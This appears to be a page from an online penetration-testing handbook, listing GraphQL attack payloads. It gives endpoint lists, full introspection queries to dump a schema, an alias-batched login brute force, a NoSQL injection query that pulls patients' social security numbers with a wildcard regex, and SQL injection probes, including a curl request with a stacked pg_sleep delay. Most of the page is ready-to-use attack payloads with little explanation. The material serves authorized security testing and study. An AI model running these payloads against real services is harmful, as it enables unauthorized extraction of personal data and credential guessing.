๐Ÿฆธ
PEN TESTING BOOK
  • ๐Ÿ“˜PENETRATION TESTING BOOK
  • โ˜ฎ๏ธPENTESTING PROCESS
    • 1๏ธโƒฃPre-Engagement
    • 2๏ธโƒฃIntelligence Gathering / Reconnaissance
    • 3๏ธโƒฃThreat Modeling
    • 4๏ธโƒฃVulnerability Assessment
    • 5๏ธโƒฃExploitation
    • 6๏ธโƒฃPost-Exploitation
    • 7๏ธโƒฃReporting
  • ๐ŸชŸWindows Privilege Escalation
    • ๐Ÿ› ๏ธWindows Exploit Suggester
    • ๐Ÿ„โ€โ™‚๏ธWindows-Privilege-Escalation
  • ๐ŸงLinux Privilege Escalation
    • ๐Ÿ„โ€โ™€๏ธLInux-Privilege-Escalation
  • ๐ŸงLinux Exploit Development Tools
    • ๐Ÿ”งExploit Development Tools
  • ๐Ÿ•ธ๏ธWeb Application Pentesting
    • ๐Ÿ“ˆgraphql injection
    • ๐Ÿฑcross site scripting
    • ๐Ÿ’‰Command Injection
    • ๐Ÿ—ƒ๏ธfile upload vulnerability
    • ๐Ÿถflask
    • ๐Ÿฆ•idor
    • ๐Ÿ“‚local file inclusion
    • ๐Ÿš›Sensitive Data Exposure Cheat Sheet
    • ๐Ÿดwordpress pentesting
    • โŒxxe attack
    • ๐Ÿ”“Authentication Bypass
    • ๐Ÿ•ธ๏ธWebshells
    • ๐Ÿ‚SSRF
    • ๐Ÿˆโ€โฌ›Git Exposure
    • โœ–๏ธXSS WAF Bypass
    • XPath Injection
  • ๐Ÿ”Reverse Engineering
    • ๐Ÿฒintro to ghidra
  • ๐Ÿฆนโ€โ™‚๏ธNetwork Pentesting 101
    • โ˜ข๏ธRouter Setup
      • Vyatta Router VM Setup Guide
    • ๐Ÿ”ขEnumeration
      • 22, 161, 162 - SSH, SNMP
    • ๐Ÿง™Brute Force Attacks
      • Brute Forcing Cheat sheet
    • ๐Ÿ›‚Post Exploitation
    • Firewall Pentesting
  • ๐Ÿ”…Internet of Things
    • ๐Ÿ“ณEnumerating IoT Devices
    • ๐Ÿ˜ทDissecting Embedded Devices
    • ๐Ÿ‘จโ€๐Ÿ’ปExploiting Embedded Devices
    • ๐ŸŽฎDynamic Analysis with Emulation
    • โ˜ฎ๏ธFirmware Analysis
      • Firmware Analysis
      • Bootloader testing
    • Drone Pentesting
      • Common Attacks
      • Threat Categories
    • Hacking Vending Machines
  • ๐Ÿš”Automotive Pentesting
    • ๐Ÿ”ŒVirtual CAN
      • Dump Traffic
  • ๐Ÿ—ณ๏ธContainer Pentesting
    • ๐Ÿณdocker pentesting
    • ๐Ÿ‹docker container escape
    • ๐Ÿ‹Docker CVE's
    • โ˜ธ๏ธkubernetes pentesting
  • ๐ŸŒ†SMART CITY PENTESTING
    • โ™พ๏ธProtocols
      • LoRa-WAN
  • ๐ŸชฆACTIVE DIRECTORY PENTESTING
    • ๐ŸŒŒActive Directory Post Exploitation
  • โ˜„๏ธCommand and Control
    • ๐ŸŒฉ๏ธC2 In The Cloud
    • ๐Ÿ”C2 HTTP Redictor
    • โ˜ธ๏ธHavoc C2
    • โ›ŽSliver C2
    • ๐Ÿฆ„Mythic C2
  • ๐Ÿฆ‹PENTESTING CISCO DEVICES
    • ๐Ÿ”ฆCisco-Torch : Enumeration
    • ๐Ÿ”“Password Attack (Type 5)
  • RED TEAMING
    • ๐Ÿฆ•Initial Access
      • โš”๏ธWeaponization
    • ๐Ÿ”ฅFrameworks
      • Atomic Red Team
      • MITRE Caldera
Powered by GitBook
On this page
  • Graphql Injection
  • Common GraphQL endpoints
  • Universal Queries
  • Introspection
  • Identify an injection point
  • Errors
  • Enumerate Database Schema via Introspection
  • Querying
  • Mutations
  • Aliases
  • Query name based batching
  • Injections
  • References

Was this helpful?

  1. Web Application Pentesting

graphql injection

Graphql Injection

Common GraphQL endpoints

/v1/explorer
/v1/graphiql
/graph
/graphql
/graphql/console/
/graphql.php
/graphiql
/graphiql.php

Universal Queries

query{__typename}

Introspection

query={__schema{types{name,fields{name}}}}
query={__schema{types{name,fields{name,args{name,description,type{name,kind,ofType{name, kind}}}}}}}

Identify an injection point

example.com/graphql?query={__schema{types{name}}}
example.com/graphiql?query={__schema{types{name}}}

Errors

?query={__schema}
?query={}
?query={thisdefinitelydoesnotexist}

Enumerate Database Schema via Introspection

Encoded

fragment+FullType+on+__Type+{++kind++name++description++fields(includeDeprecated%3a+true)+{++++name++++description++++args+{++++++...InputValue++++}++++type+{++++++...TypeRef++++}++++isDeprecated++++deprecationReason++}++inputFields+{++++...InputValue++}++interfaces+{++++...TypeRef++}++enumValues(includeDeprecated%3a+true)+{++++name++++description++++isDeprecated++++deprecationReason++}++possibleTypes+{++++...TypeRef++}}fragment+InputValue+on+__InputValue+{++name++description++type+{++++...TypeRef++}++defaultValue}fragment+TypeRef+on+__Type+{++kind++name++ofType+{++++kind++++name++++ofType+{++++++kind++++++name++++++ofType+{++++++++kind++++++++name++++++++ofType+{++++++++++kind++++++++++name++++++++++ofType+{++++++++++++kind++++++++++++name++++++++++++ofType+{++++++++++++++kind++++++++++++++name++++++++++++++ofType+{++++++++++++++++kind++++++++++++++++name++++++++++++++}++++++++++++}++++++++++}++++++++}++++++}++++}++}}query+IntrospectionQuery+{++__schema+{++++queryType+{++++++name++++}++++mutationType+{++++++name++++}++++types+{++++++...FullType++++}++++directives+{++++++name++++++description++++++locations++++++args+{++++++++...InputValue++++++}++++}++}}

Decoded

fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
}
fragment InputValue on __InputValue {
  name
  description
  type {
    ...TypeRef
  }
  defaultValue
}
fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
              }
            }
          }
        }
      }
    }
  }
}

query IntrospectionQuery {
  __schema {
    queryType {
      name
    }
    mutationType {
      name
    }
    types {
      ...FullType
    }
    directives {
      name
      description
      locations
      args {
        ...InputValue
      }
    }
  }
}

Querying

query={flags{name, value}}

query={hiddenFlags}

Mutations

# mutation{signIn(login:"Admin", password:"secretp@ssw0rd"){token}}
# mutation{addUser(id:"1", name:"Dan Abramov", email:"dan@dan.com") {id name email}}

Aliases

mutation {
  login(pass: 1111, username: "bob")
  second: login(pass: 2222, username: "bob")
  third: login(pass: 3333, username: "bob")
  fourth: login(pass: 4444, username: "bob")
}

Query name based batching

{
    "query": "query { qname: Query { field1 } qname1: Query { field1 } }"
}

Injections

NOSQL injection

{
  doctors(
    options: "{\"limit\": 1, \"patients.ssn\" :1}", 
    search: "{ \"patients.ssn\": { \"$regex\": \".*\"}, \"lastName\":\"Admin\" }")
    {
      firstName lastName id patients{ssn}
    }
}

SQL injection

{ 
    bacon(id: "1'") { 
        id, 
        type, 
        price
    }
}
curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(30\)%3B--%27

References

PreviousExploit Development ToolsNextcross site scripting

Was this helpful?

๐Ÿ•ธ๏ธ
๐Ÿ“ˆ
PayloadsAllTheThings
HackTricks Book